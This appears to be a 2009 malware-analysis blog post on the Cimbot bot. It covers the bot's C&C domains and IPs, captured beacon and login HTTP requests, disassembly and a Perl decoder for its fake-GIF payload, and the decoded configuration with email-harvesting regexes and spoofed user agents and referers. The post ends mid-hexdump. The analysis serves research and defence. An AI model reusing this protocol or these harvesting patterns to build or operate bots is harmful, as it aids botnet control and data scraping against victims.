Cimbot - A Technical Analysis

Personal Exposition

I was recently sent a .pcap file of a bot's C&C communications. Every 182

seconds, the bot would download a GIF file from vazasaki-ji.info

(91.211.65.180 as of Mar 11, 2009). These GIF files however are not

well-formed — that is to say, it's a GIF89a header, followed by a lot

of random gibberish.

At last! Something interesting and clever (this will make a good blog

post). I've been wondering why it

took so long for the bot authors to try to hide their communications

steganographically (albeit poorly in this case).

At first I didn't have a sample of this bot, only its communications. Just

eyeballing a hexdump of the data revealed some very strong patterns. It was

safe to assume that this was a home-brew enciphering routine; I speculated

that it was just a sixteen (or some multiple of sixteen) byte pattern,

repeatedly XOR'd over the plaintext. Performing some statistical analysis of

every nth byte of the cyphertext (for n = 1 ..

16) showed some very strong

language-like patterns. There were only about 80 to 90 distinct bytes per

nth column of cyphertext, about what you'd expect for printable ASCII, And

there was a slight power-law distribution of those bytes, rather than a

high-entropy flat distribution that a good encryption algorithm would

produce.

Most home-brew cryptosystems like this are trivial to crack, so I started

on a cyphertext-only cryptanalysis, and got pretty far along, until I received

a Cimbot sample from Joe Stewart [SecureWorks]. And then I could cheat by just analyzing

the binary code of the bot itself.

The Technical Part

Cimbot is written in Microsoft Visual C++. According to the PE headers of

the sample I have now, it was compiled/linked on Tue Mar 25 04:31:15 2008

(but that's not always trustworthy). The bot sample I received communicates

with sufujilisi.info (91.212.65.94 as of Mar 11, 2009), and does not use

SSL — which I strongly suspect that more recent versions do. (As an

aside: if anyone reading this has more Cimbot samples, please feel free to send

them to me.)

This Cimbot sample is a module out of a larger malware system, which is the

part which actually starts-up on boot, then loads Cimbot (stored encrypted

on disk) into memory; Cimbot doesn't execute on its own. When executed

Cimbot sets a pseudo-random registry key (which it frequently polls), and

spawns a second thread (you know, all the usual stuff), it calls

GetTickCount() in a loop, Sleep()ing for a second each

time; it keeps checking if 60 seconds have passed; there are some calls to

rand(). If the clock tick is above a certain value, it'll make an

HTTP request to log-in to the C&C server. It's not really setting any

state

— just waiting — so if you're too ADHD to wait through all of this in a

debugger, you can just flip the ZF bit when you get to that branch. (Or

modify that jump instruction in the binary, the bot doesn't do any integrity

checking.)

During initialization (before that loop I just mentioned) it calls

GetVolumeInformationA() to get the VolumeSerialNumber of the System drive.

It uses this value to generate an identity, which is used when initially

logging into the C&C server… and… for decrypting (really deobfuscating)

the encoded GIF data.

First Example

(Note that these examples have been scrubbed for anything which would reveal a victim's IP address or my own.)

The first thing the bot will send is this. The

C63B220838F1 part is

a unique identity for the bot, and also the crypto key.

GET /account/l.php?C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D

HTTP/1.1

Host: sufujilisi.info

Accept: */*

Connection: close

The C&C will send back something like this:

HTTP/1.1 200 OK

Date: Thu, 12 Mar 2009 01:43:05 GMT

Server: Apache/2.0.58 (Win32) PHP/5.1.4

X-Powered-By: PHP/5.1.4

Set-Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896; path=/

Content-Length: 0

Connection: close

Content-Type: text/html

The bot then uses that PHPSESSID Cookie for all further communications

with the C&C.

The next thing that the bot will ask for is:

GET /account/d.php?data=7ef326c40791673eef9768c8921aaec4daf0 HTTP/1.1

Host: sufujilisi.info

Accept: */*

Connection: close

Cookie: PHPSESSID=47d3066a386f5532af8a1d69c46c4896

I kinda skimmed through the part where it calculates the

7ef136c49

stuff after the ?data= part. I can figure it out later if anyone cares.

I've noticed that the two bytes (daf0 in this example) will change over

time.

So, the C&C server send back something like this (with the fake-GIF hexified

here, for your blogging pleasure):

HTTP/1.1 200 OK

Date: Thu, 12 Mar 2009 02:25:39 GMT

Server: Apache/2.0.58 (Win32) PHP/5.1.4

X-Powered-By: PHP/5.1.4

Content-Length: 2641

Connection: close

Content-Type: image/gif

00000000 47 49 46 38 39 61 03 b2 05 89 26 c2 5f 99 36 ca |GIF89a....&._.6.|

00000010 48 26 12 38 f1 dc 0a 2a 09 e9 a3 17 c1 e4 87 e6 |H&.8...*........|

00000020 3b 22 08 38 f1 5b 0f 8a 09 e9 a3 58 c1 e8 87 c6 |;".8.[.....X....|

00000030 3b a2 f6 6e f1 5d 0f 8b 09 e9 a3 1a 04 e4 8b c6 |;..n.]..........|

00000040 3b 22 68 22 f1 1b 53 8a 0d e9 a3 17 e1 a3 89 c6 |;"h"..S.........|

00000050 3c 22 37 38 f1 1b 35 8a 38 51 15 7c 27 40 fa f0 |<"78..5.8Q.|'@..|

00000060 97 5f 64 ab 1b 43 6b ac 85 45 ca 40 00 0c b5 f0 |._d..Ck..E.@....|

00000070 7a 4b 63 94 22 77 4d e6 30 45 c5 74 f0 4d 89 ea |zKc."wM.0E.t.M..|

00000080 6d 86 08 38 f1 1d 0f 15 09 e9 a3 93 c1 13 af 21 |m..8...........!|

00000090 9c 4f 82 68 1e 54 6b b7 66 64 d4 43 f4 14 04 ef |.O.h.Tk.fd.C....|

000000a0 97 95 83 68 1d 50 8c b2 31 45 fe 45 3c 14 b3 f7 |...h.P..1E.E<...|

000000b0 6d 9f 64 95 1a 97 4f 06 31 45 ff 3c f5 14 b0 ef |m.d...O.1E.<....|

000000c0 97 95 83 68 1d 50 8c b2 64 4a d0 91 f1 11 c0 22 |...h.P..dJ....."|

000000d0 68 7e 36 95 6c 4c 3b bd 39 66 cc 73 34 5f b7 f2 |h~6.lL;.9f.s4_..|

000000e0 70 9f 30 60 4d 76 3d 05 39 15 d4 49 3e 40 e4 ef |p.0`Mv=.9..I>@..|

000000f0 b7 7e 36 61 4d 8e 8a ba 35 1e 20 3f 1c 45 b4 40 |.~6aM...5. ?.E.@|

00000100 98 9d 3a 64 25 98 38 b9 72 f1 c7 48 01 08 bc f4 |..:d%.8.r..H....|

00000110 5f 5a 6c 38 f1 1b 12 8a 20 e9 a3 17 d3 e4 b6 ee |_Zl8.... .......|

00000120 ae 8b 6c 75 4c 7c 3c f0 39 16 dc 74 eb 0d b6 2f |..luL|<.9..t.../|

00000130 3d 46 39 3b f1 36 0f 8a 09 ff a3 46 e9 57 ec 39 |=F9;.6.....F.W.9|

00000140 ae 8b 77 a6 2e 76 70 b7 6f 19 d0 50 1e 0e b0 f5 |..w..vp.o..P....|

00000150 a4 24 2c 69 f4 1b 26 8a 09 e9 b5 17 f0 0c ea 2f |.$,i..&......../|

00000160 9f 5f 63 99 1e 81 3f b7 42 46 cd 40 f0 4d 89 ea |._c...?.BF.@.M..|

00000170 6c 25 08 4d f1 1b 0f 9a 09 18 cb 8a fe 3f e8 f3 |l%.M.........?..|

00000180 a1 52 35 71 4e 45 38 b9 72 eb c7 48 c4 e4 96 c6 |.R5qNE8.r..H....|

00000190 3b 22 12 38 20 43 6b ad 37 13 cc 3b f0 4d 89 ea |;".8 Ck.7..;.M..|

000001a0 6c 26 08 0b f1 1b 0f 5b 09 18 ff 45 e9 4b f0 2c |l&.....[...E.K.,|

000001b0 64 9e 30 a2 61 82 38 06 31 59 11 7e ea 60 af 2d |d.0.a.8.1Y.~.`.-|

000001c0 b5 4b 84 60 6b 84 7f b3 85 11 15 78 33 0d 03 ee |.K.`k......x3...|

000001d0 a8 92 3b 61 6d 43 74 02 6e 12 1f 3f 2b 54 ec 2d |..;amCt.n..?+T.-|

000001e0 64 9e 30 af 52 91 38 06 31 4a 15 81 ea 60 af 3a |d.0.R.8.1J...`.:|

000001f0 9c 94 31 b4 19 8f 76 04 32 65 cb 78 24 49 b0 42 |..1...v.2e.x$I.B|

00000200 63 96 71 9e 1a 97 37 ec 76 59 cc 93 e9 45 fd 2f |c.q...7.vY...E./|

00000210 64 9e 30 ac 52 8d 38 06 31 59 07 7d ea 60 af 28 |d.0.R.8.1Y.}.`.(|

00000220 b5 4b 84 60 53 95 41 b3 85 11 10 8a 2a 0d 03 ee |.K.`S.A.....*...|

00000230 9e 83 6a 61 6d 43 73 f6 75 12 1f 3f 34 5d fa ef |..jamCs.u..?4]..|

00000240 b7 4a 3b 9f 61 44 8b b2 7c 52 16 40 3d 0c fa 2f |.J;.aD..|R.@=../|

00000250 ae 9a 31 b4 19 88 7f f1 32 65 cb 84 31 49 ee ef |..1.....2e..1I..|

00000260 b7 4a 71 9b 60 44 8b b2 7c 60 09 40 3d 0c fe 33 |.Jq.`D..|`.@=..3|

00000270 b1 4b 84 60 68 88 70 b3 38 52 a7 17 dd e4 87 c6 |.K.`h.p.8R......|

00000280 55 22 37 60 5e 7c 78 f6 7d 58 dd 40 3d 0c f1 27 |U"7`^|x.}X.@=..'|

00000290 b1 83 7b 9b 63 84 7f fe 43 12 d2 80 c7 e4 8b c6 |..{.c...C.......|

000002a0 3b 22 48 45 f4 1b 16 8a 47 e9 a3 17 fe 31 f6 40 |;"HE....G....1.@|

000002b0 a4 8e 74 99 20 4f 3d ba 29 11 06 86 2e 54 e8 3a |..t. O=.)....T.:|

000002c0 a4 84 74 9d 2c 3b 5c dd 52 2e c3 4d ef 14 c2 e6 |..t.,;\.R..M....|

000002d0 92 8b 76 9c 60 92 82 aa 57 3d c3 4c ef 15 c2 e6 |..v.`...W=.L....|

000002e0 8e 78 39 73 11 49 5d cf 5d 12 aa 17 0c e4 87 c6 |.x9s.I].].......|

000002f0 85 6f 77 b2 5a 87 7b eb 38 1d d1 47 e1 0c ea 35 |.ow.Z.{.8..G...5|

00000300 a8 92 69 ac 5a 7d 7b ef 44 09 f0 6a 0a 29 a7 fc |..i.Z}{.D..j.)..|

00000310 69 52 43 58 48 84 7d ee 78 60 16 37 0f 38 a7 fb |iRCXH.}.x`.7.8..|

00000320 69 53 43 58 44 71 40 c5 29 17 f1 5c 15 04 ca 12 |iSCXDq@.)..\....|

00000330 8d 42 39 66 22 49 43 bd 3b 1b cc 1e c1 3f 87 c6 |.B9f"IC.;....?..|

00000340 3b 7c 55 a7 6b 84 7b f6 6a 18 d8 45 f1 04 af 1d |;|U.k.{.j..E....|

00000350 a4 90 6c a7 68 8e 4a aa 5e 24 c3 6e 2a 52 eb 35 |..l.h.J.^$.n*R.5|

00000360 b2 95 28 86 45 3b 44 b8 3a 24 c3 7c 2f 11 dc 19 |..(.E;D.:$.|/...|

00000370 76 42 7a ae 2b 4c 3d c2 37 19 d1 4e ea 04 ce 2b |vBz.+L=.7..N...+|

00000380 9e 8d 77 67 23 4b 3f c0 39 22 d3 50 e1 2a f0 38 |..wg#K?.9".P.*.8|

00000390 a0 88 77 b0 20 4c 3d bf 37 19 d1 4e c8 e4 e6 c6 |..w. L=.7..N....|

000003a0 3b 22 66 85 60 95 78 f6 75 4a d2 4b ef 14 a7 ee |;"f.`.x.uJ.K....|

000003b0 9e 91 75 a8 52 8f 78 ec 75 4e de 37 0e 37 d0 0b |..u.R.x.uN.7.7..|

000003c0 5b 58 36 68 2c 3b 66 f3 77 4d 12 8e 34 04 d5 1a |[X6h,;f.wM..4...|

000003d0 5b 57 36 69 2c 3b 62 e0 3a 24 c3 45 0f 29 db e6 |[W6i,;b.:$.E.)..|

000003e0 7e 6e 5a 58 22 49 40 b8 3d 1c d5 49 fc 04 b5 14 |~nZX"I@.=..I....|

000003f0 80 76 28 7b 3d 6d 2f bc 37 19 d1 4c f1 1b b9 fd |.v({=m/.7..L....|

00000400 64 29 08 6b f1 1b 0f bc 56 58 1d 80 2d 50 e8 f5 |d).k....VX..-P..|

00000410 6f 50 38 58 19 7e 7e f7 79 4a 17 80 23 50 ec 01 |oP8X.~~.yJ..#P..|

00000420 5b 6f 5b 81 36 3b 45 b8 39 24 c3 6e 2a 52 eb 35 |[o[.6;E.9$.n*R.5|

00000430 b2 95 28 86 45 3b 44 b8 3a 12 aa 17 18 e4 87 c6 |..(.E;D.:.......|

00000440 91 6f 77 b2 5a 87 7b eb 38 1d d1 47 e1 0c ea 35 |.ow.Z.{.8..G...5|

00000450 a8 92 69 ac 5a 7d 7b ef 44 09 f0 6a 0a 29 a7 fc |..i.Z}{.D..j.)..|

00000460 69 52 43 58 48 84 7d ee 78 60 16 37 0f 38 a7 fb |iRCXH.}.x`.7.8..|

00000470 69 53 43 58 44 71 40 c5 29 17 f1 5c 15 04 ca 12 |iSCXDq@.)..\....|

00000480 8d 42 39 66 22 49 43 bd 3b 1b de 37 0a 52 ed 35 |.B9f"IC.;..7.R.5|

00000490 8b 83 7c a0 1f 4c 38 92 09 ec a3 17 c1 e6 ec 34 |..|..L8........4|

000004a0 44 22 25 38 f1 1b 2a 8a 5b 4e 09 7c 33 49 f9 00 |D"%8..*.[N.|3I..|

000004b0 5b 8a 7c ac 61 55 3e b9 75 4e 11 8c 38 12 ea 35 |[.|.aU>.uN..8..5|

000004c0 a8 2f 12 41 f1 36 0f 8a 09 02 a3 69 26 4a ec 38 |./.A.6.....i&J.8|

000004d0 a0 94 42 58 59 8f 83 fa 43 18 d2 7b 26 5a e8 3d |..BXY...C..{&Z.=|

000004e0 69 85 77 a5 fa 1b 2a 8a 09 e9 bc 17 13 49 ed 2b |i.w...*......I.+|

000004f0 ad 87 7a 72 11 83 83 fe 79 23 d2 46 25 49 fd 27 |..zr....y#.F%I.'|

00000500 b2 50 6b a7 5e 24 0f a5 09 e9 a3 30 c1 36 ec 2c |.Pk.^$.....0.6.,|

00000510 a0 94 6d aa 2b 3b 77 fe 7d 59 dd 46 f0 48 ec 3c |..m.+;w.}Y.F.H.<|

00000520 9c 99 36 9b 60 88 18 8a 24 e9 a3 17 da e4 d9 2b |..6.`...$......+|

00000530 a1 87 7a 9d 63 55 2f f2 7d 5d 13 51 f0 13 f3 2b |..z.cU/.}].Q...+|

00000540 a9 97 7f 66 54 8a 7c 93 09 04 a3 17 c1 fd 87 18 |...fT.|.........|

00000550 a0 88 6d aa 56 8d 49 aa 71 5d 17 87 fb 13 b6 32 |..m.V.I.q].....2|

00000560 a0 90 7d af 1f 7e 7e f7 12 e9 a5 17 c1 e4 87 c6 |..}..~~.........|

00000570 44 22 0a 38 f1 1b 0f 8a 12 e9 a5 17 c1 e4 87 c6 |D".8............|

*

00000860 45 22 0c 38 f1 1b 8f a4 0f e9 ae 17 c2 e4 87 c6 |E".8............|

00000870 3c 2e 08 39 f1 1b 0f 8b 15 ea a4 17 c1 e4 88 d2 |<..9............|

00000880 3d 23 08 38 f1 1d 1b 8d 0a e9 a3 17 c5 f0 8b c7 |=#.8............|

00000890 3b 22 08 3b fd 20 10 8a 09 e9 a8 23 c7 e5 87 c6 |;".;. .....#....|

000008a0 3b 27 14 3f f2 1b 0f 8a 0e f5 ab 18 c1 e4 87 cb |;'.?............|

000008b0 47 2b 09 38 f1 1b 14 97 09 ea a3 17 c1 e5 95 c6 |G+.8............|

000008c0 3f 22 08 38 41 de 0f 8a 18 e9 a4 17 c1 e4 88 d7 |?".8A...........|

000008d0 3b 4a 08 38 f1 41 0f b9 67 11 fe 78 ee 5e b7 f3 |;J.8.A..g..x.^..|

000008e0 74 7e 35 95 6c 4c 3b bc 3d 66 cc 73 ef 0c e2 27 |t~5.lL;.=f.s...'|

000008f0 68 9c 64 66 4e 96 41 b6 40 66 cc 3b f0 f5 87 02 |h.dfN.A.@f.;....|

00000900 3b 22 08 72 f1 4a 6d b2 64 4a d0 91 f1 11 c0 22 |;".r.Jm.dJ....."|

00000910 69 7f 83 69 1d 4e 3f 07 32 45 d1 3f 1c 45 b4 40 |i..i.N?.2E.?.E.@|

00000920 6b 4f 41 94 1e 78 8a bb 35 1b d7 94 ea 40 b5 ee |kOA..x..5....@..|

00000930 96 83 35 b2 4d 49 6c 05 3b 15 da 94 ea 08 b6 d8 |..5.MIl.;.......|

00000940 3b 69 08 38 f1 60 0f b9 31 4a 05 8c 34 49 b0 42 |;i.8.`..1J..4I.B|

00000950 63 83 6c a5 5a 89 38 06 31 60 08 79 2e 45 fa 3a |c.l.Z.8.1`.y.E.:|

00000960 a0 94 31 b4 19 8b 7e fd 7d 56 04 8a 35 49 f9 ef |..1...~.}V..5I..|

00000970 b7 4a 70 9d 5d 8b 38 06 31 51 12 8a 35 51 e8 39 |.Jp.].8.1Q..5Q.9|

00000980 af 87 7a 61 6d 43 82 fa 6a 56 cc 46 d4 e4 8b c6 |..zamC..jV.F....|

00000990 3b 22 90 4b f2 1b 30 8a 0a e9 a3 17 c2 05 88 c7 |;".K..0.........|

000009a0 3b 22 08 39 12 1d 10 8a 09 e9 a5 38 c4 e5 87 c6 |;".9.......8....|

000009b0 3b 40 29 3c f2 1b 0f 8a 0f 0a a8 18 c1 e4 87 cd |;@)<............|

000009c0 5c 28 09 38 f1 1b 17 ab 10 ea a3 17 c1 ed a8 ce |\(.8............|

000009d0 3c 22 08 38 fb 3c 18 8b 09 e9 a3 26 e3 e4 8c c6 |<".8.<.....&....|

000009e0 3b 22 0c 5d 3e 61 34 ad 09 ea a3 17 c1 e5 ab c6 |;".]>a4.........|

000009f0 40 22 08 38 f5 40 57 d8 2e 0e a3 19 c1 e4 87 2a |@".8.@W........*|

00000a00 3b 48 08 3c f1 1b 0f ba 7e e9 a3 3e c1 ec 87 c6 |;H.<....~..>....|

00000a10 3b 02 9b 3c f1 bb ca 97 09 f8 c5 17 c1 e4 a3 c6 |;..<............|

00000a20 60 74 49 86 35 7a 5b e9 3d 48 db 3c ef xx xx xx |`tI.5z[.=H.<. |

00000a30 xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx xx | |Redacted

00000a40 45 23 08 38 f1 1e 2f 90 09 e9 a3 72 95 25 e5 81 |E#.8../....r.%..|

00000a50 3c |<|

00000a51

(You see what I mean about the patterns mod sixteen. The high nibble of

each byte will stay within a range of only one or two adjacent values. And

some values repeat exactly from one column to the next.)

The Decoding Operation

[Drum Roll] So, this is the decryption routine, yes, this really is all there is to

it. It's just a subtraction operation.

; Attributes: bp-based frame

sub_403635 proc near ; CODE XREF: sub_403587+21↑p

key = dword ptr 8

sixteen = dword ptr 0Ch

cyphertext = dword ptr 10h

text_length = dword ptr 14h

index = esi

push ebp

mov ebp, esp

push index

xor index, index

cmp [ebp+text_length], index ; Test if passed a NULL

jbe short loc_40365B ; if NULL pointer then return

decypher_loop: ; CODE XREF: sub_403635+24↓j

mov eax, [ebp+cyphertext]

xor edx, edx

lea ecx, [index+eax] ; ECX points to current byte of the cypertext

mov eax, index

div [ebp+sixteen] ; EDX is basically index&0x0F

mov eax, [ebp+key]

mov al, [edx+eax] ; AL is the byte of the 'key'

sub [ecx], al ; The decryption function itself.

inc index

cmp index, [ebp+text_length]

jb short decypher_loop

loc_40365B: ; CODE XREF: sub_403635+9↑j

pop index

pop ebp

retn 10h

sub_403635 endp

It's called like this… The pointer to the GIF89a buffer is moved up by

15 bytes (and the length adjusted accordingly) So those bytes are not

decrypted, then it uses the first 10h (16.0) bytes of the

C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D (non-hex

in memory) string as

the subtraction key.

sub_403587      proc near                  ; CODE XREF: sub_401717+6C6↑p

; sub_40201F+13C↑p

arg_0 = dword ptr 4

mov edx, [esp+arg_0]

mov eax, [edx]

cmp eax, 0Fh ; Test that GIF is at least 16 bytes

jnb short long_enough

xor eax, eax

jmp short locret_4035B0

long_enough: ; CODE XREF: sub_403587+9↑j

add eax, 0FFFFFFF1h

push eax ; Length of (*GIF89a-15)

mov eax, [edx+4]

add eax, 0Fh

push eax ; 15 bytes from the start of GIF89a

push 10h ; First sixteen bytes of...

push offset the_bot_id ; The bot ID/key

call sub_403635

push 1

pop eax

locret_4035B0: ; CODE XREF: sub_403587+D↑j

retn 4

sub_403587 endp

So the following quickly written Perl script should decrypt this particular

(so-called) GIF file:

#!/usr/bin/perl

use strict;

use IO::File;

my @key = ( 0xC6, 0x3B, 0x22, 0x08, 0x38, 0xf1, 0x1b, 0x0f,

0x8a, 0x09, 0xe9, 0xa3, 0x17, 0xc1, 0xe4, 0x87);

# If you're too lazy to retype the bot's login string as a byte array,

# you can do something like this.

# my @key = split(//,pack("H32",

# "C63B220838F11B0F8A09E9A317C1E4871879BF928D232D8D8C0D"));

# map {$_ = ord} @key;

# You see, it's equivalent:

# print "( ",join(", ", @key)," );\n";

# You don't have to read all of the input file into memory either,

# I'm just being lazy.

my $file = shift;

my $length = (stat($file))[7];

my $everything;

open(MOO, $file);

read(MOO, $everything, $length);

close(MOO);

my @bytes = unpack("C*",$everything) ;

my $keylen = $#key;

my $offset=15;

# Do nothing for the first fifteen bytes.

for(my $i=0; $i<$offset; ) {

print pack("C", $bytes[$i++] );

}

# Then start subtracting.

for(my $i=$offset; $i<$length; ) {

print pack("C", $bytes[$i++] - $key[$i%16]); # Sooper-dooper encryption!

}

0; # The end

This is the result (hexified here for blogging purposes). It's much more

legible now...

00000000  47 49 46 38 39 61 03 b2  05 89 26 c2 5f 99 36 04  |GIF89a....&._.6.|

00000010 0d 04 0a 00 00 c1 fb a0 00 00 00 00 00 00 00 20 |............... |

00000020 00 00 00 00 00 40 00 00 00 00 00 41 00 04 00 00 |.....@.....A....|

00000030 00 80 ee 36 00 42 00 01 00 00 00 03 43 00 04 00 |...6.B......C...|

00000040 00 00 60 ea 00 00 44 00 04 00 00 00 20 bf 02 00 |..`...D..... ...|

00000050 01 00 2f 00 00 00 26 00 2f 68 72 65 66 5c 73 2a |../...&./href\s*|

00000060 5c 3d 5c 73 2a 28 5c 22 7c 5c 27 29 3f 28 2e 2a |\=\s*(\"|\')?(.*|

00000070 3f 29 5b 5c 31 5c 3e 5c 27 5c 22 5d 2f 69 02 24 |?)[\1\>\'\"]/i.$|

00000080 32 64 00 00 00 02 00 8b 00 00 00 7c 00 2f 28 5b |2d.........|./([|

00000090 61 2d 7a 30 2d 39 5c 2d 5d 7b 31 2c 33 30 7d 29 |a-z0-9\-]{1,30})|

000000a0 5c 73 7b 30 2c 35 7d 28 28 5c 5b 2e 7b 30 2c 31 |\s{0,5}((\[.{0,1|

000000b0 32 7d 5c 5d 29 7c 40 7c 28 5c 5c 25 34 30 29 29 |2}\])|@|(\\%40))|

000000c0 5c 73 7b 30 2c 35 7d 28 5b 61 2d 7a 30 2d 39 5c |\s{0,5}([a-z0-9\|

000000d0 2d 5c 2e 5d 7b 31 2c 33 30 7d 29 5c 73 7b 30 2c |-\.]{1,30})\s{0,|

000000e0 35 7d 28 28 5c 5b 2e 7b 30 2c 31 32 7d 5c 5d 29 |5}((\[.{0,12}\])|

000000f0 7c 5c 2e 29 5c 73 7b 30 2c 35 7d 28 5b 61 2d 7a ||\.)\s{0,5}([a-z|

00000100 5d 7b 32 2c 34 7d 29 2f 69 08 24 31 40 24 35 2e |]{2,4})/i.$1@$5.|

00000110 24 38 64 00 00 00 03 00 17 00 00 00 12 00 2f 28 |$8d.........../(|

00000120 73 69 64 3d 5b 61 2d 66 30 2d 39 5d 2a 29 2f 69 |sid=[a-f0-9]*)/i|

00000130 02 24 31 03 00 1b 00 00 00 16 00 2f 28 73 65 73 |.$1......../(ses|

00000140 73 69 6f 6e 3d 5b 61 2d 66 30 2d 39 5d 2a 29 2f |sion=[a-f0-9]*)/|

00000150 69 02 24 31 03 00 17 00 00 00 12 00 2f 28 63 69 |i.$1......../(ci|

00000160 64 3d 5b 61 2d 66 30 2d 39 5d 2a 29 2f 69 02 24 |d=[a-f0-9]*)/i.$|

00000170 31 03 00 15 00 00 00 10 00 2f 28 73 3d 5b 61 2d |1......../(s=[a-|

00000180 66 30 2d 39 5d 2a 29 2f 69 02 24 31 03 00 0f 00 |f0-9]*)/i.$1....|

00000190 00 00 0a 00 2f 28 5c 23 2e 2a 29 24 2f 69 02 24 |..../(\#.*)$/i.$|

000001a0 31 04 00 d3 00 00 00 d1 00 2f 5c 2e 28 67 69 66 |1......../\.(gif|

000001b0 29 7c 28 6a 70 67 29 7c 28 70 6e 67 29 7c 28 67 |)|(jpg)|(png)|(g|

000001c0 7a 29 7c 28 7a 69 70 29 7c 28 72 61 72 29 7c 28 |z)|(zip)|(rar)|(|

000001d0 6d 70 33 29 7c 28 65 78 65 29 7c 28 6a 70 65 67 |mp3)|(exe)|(jpeg|

000001e0 29 7c 28 77 61 76 29 7c 28 61 72 6a 29 7c 28 74 |)|(wav)|(arj)|(t|

000001f0 61 72 29 7c 28 74 67 7a 29 7c 28 61 63 65 29 7c |ar)|(tgz)|(ace)||

00000200 28 74 69 66 29 7c 28 62 6d 70 29 7c 28 61 76 69 |(tif)|(bmp)|(avi|

00000210 29 7c 28 74 61 72 29 7c 28 70 64 66 29 7c 28 62 |)|(tar)|(pdf)|(b|

00000220 7a 29 7c 28 62 7a 32 29 7c 28 6d 73 69 29 7c 28 |z)|(bz2)|(msi)|(|

00000230 63 61 62 29 7c 28 64 6c 6c 29 7c 28 73 79 73 29 |cab)|(dll)|(sys)|

00000240 7c 28 33 67 70 29 7c 28 73 69 73 29 7c 28 73 69 ||(3gp)|(sis)|(si|

00000250 73 78 29 7c 28 6d 70 67 29 7c 28 6d 70 65 67 29 |sx)|(mpg)|(mpeg)|

00000260 7c 28 69 63 6f 29 7c 28 73 77 66 29 7c 28 77 6d ||(ico)|(swf)|(wm|

00000270 76 29 7c 28 77 6d 61 29 2f 69 04 00 1c 00 00 00 |v)|(wma)/i......|

00000280 1a 00 2f 28 6d 61 69 6c 74 6f 3a 29 7c 28 6a 61 |../(mailto:)|(ja|

00000290 76 61 73 63 72 69 70 74 3a 29 2f 69 06 00 04 00 |vascript:)/i....|

000002a0 00 00 40 0d 03 00 07 00 3e 00 00 00 3d 4d 6f 7a |..@.....>...=Moz|

000002b0 69 6c 6c 61 2f 34 2e 30 20 28 63 6f 6d 70 61 74 |illa/4.0 (compat|

000002c0 69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20 |ible; MSIE 6.0; |

000002d0 57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20 |Windows NT 5.1; |

000002e0 53 56 31 3b 20 2e 4e 45 54 29 07 00 4b 00 00 00 |SV1; .NET)..K...|

000002f0 4a 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f |JMozilla/4.0 (co|

00000300 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 |mpatible; MSIE 6|

00000310 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 |.0; Windows NT 5|

00000320 2e 31 3b 20 53 56 31 3b 20 2e 4e 45 54 20 43 4c |.1; SV1; .NET CL|

00000330 52 20 31 2e 31 2e 34 33 32 32 29 07 00 5b 00 00 |R 1.1.4322)..[..|

00000340 00 5a 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 57 |.ZMozilla/5.0 (W|

00000350 69 6e 64 6f 77 73 3b 20 55 3b 20 57 69 6e 64 6f |indows; U; Windo|

00000360 77 73 20 4e 54 20 35 2e 31 3b 20 65 6e 2d 55 53 |ws NT 5.1; en-US|

00000370 3b 20 72 76 3a 31 2e 38 2e 30 2e 37 29 20 47 65 |; rv:1.8.0.7) Ge|

00000380 63 6b 6f 2f 32 30 30 36 30 39 30 39 20 46 69 72 |cko/20060909 Fir|

00000390 65 66 6f 78 2f 31 2e 35 2e 30 2e 37 07 00 5f 00 |efox/1.5.0.7.._.|

000003a0 00 00 5e 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 |..^Mozilla/4.0 (|

000003b0 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 |compatible; MSIE|

000003c0 20 36 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 | 6.0; Windows NT|

000003d0 20 35 2e 31 3b 20 53 56 31 3b 20 2e 4e 45 54 20 | 5.1; SV1; .NET |

000003e0 43 4c 52 20 31 2e 31 2e 34 33 32 32 3b 20 2e 4e |CLR 1.1.4322; .N|

000003f0 45 54 20 43 4c 52 20 32 2e 30 2e 35 30 37 32 37 |ET CLR 2.0.50727|

00000400 29 07 00 33 00 00 00 32 4d 6f 7a 69 6c 6c 61 2f |)..3...2Mozilla/|

00000410 34 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b |4.0 (compatible;|

00000420 20 4d 53 49 45 20 36 2e 30 3b 20 57 69 6e 64 6f | MSIE 6.0; Windo|

00000430 77 73 20 4e 54 20 35 2e 31 29 07 00 57 00 00 00 |ws NT 5.1)..W...|

00000440 56 4d 6f 7a 69 6c 6c 61 2f 34 2e 30 20 28 63 6f |VMozilla/4.0 (co|

00000450 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 36 |mpatible; MSIE 6|

00000460 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 35 |.0; Windows NT 5|

00000470 2e 31 3b 20 53 56 31 3b 20 2e 4e 45 54 20 43 4c |.1; SV1; .NET CL|

00000480 52 20 31 2e 31 2e 34 33 32 32 3b 20 49 6e 66 6f |R 1.1.4322; Info|

00000490 50 61 74 68 2e 31 29 08 00 03 00 00 00 02 65 6e |Path.1).......en|

000004a0 09 00 1d 00 00 00 1b 00 52 65 66 65 72 65 72 3a |........Referer:|

000004b0 20 68 74 74 70 3a 2f 2f 6c 65 6e 75 77 2e 63 6f | http://lenuw.co|

000004c0 6d 0d 0a 09 00 1b 00 00 00 19 00 52 65 66 65 72 |m..........Refer|

000004d0 65 72 3a 20 68 74 74 70 3a 2f 2f 64 65 76 61 77 |er: http://devaw|

000004e0 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 65 66 65 |.com........Refe|

000004f0 72 65 72 3a 20 68 74 74 70 3a 2f 2f 64 65 76 61 |rer: http://deva|

00000500 77 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 65 66 |w.com........Ref|

00000510 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 64 65 76 |erer: http://dev|

00000520 61 77 2e 63 6f 6d 09 00 1b 00 00 00 19 00 52 65 |aw.com........Re|

00000530 66 65 72 65 72 3a 20 68 74 74 70 3a 2f 2f 6c 65 |ferer: http://le|

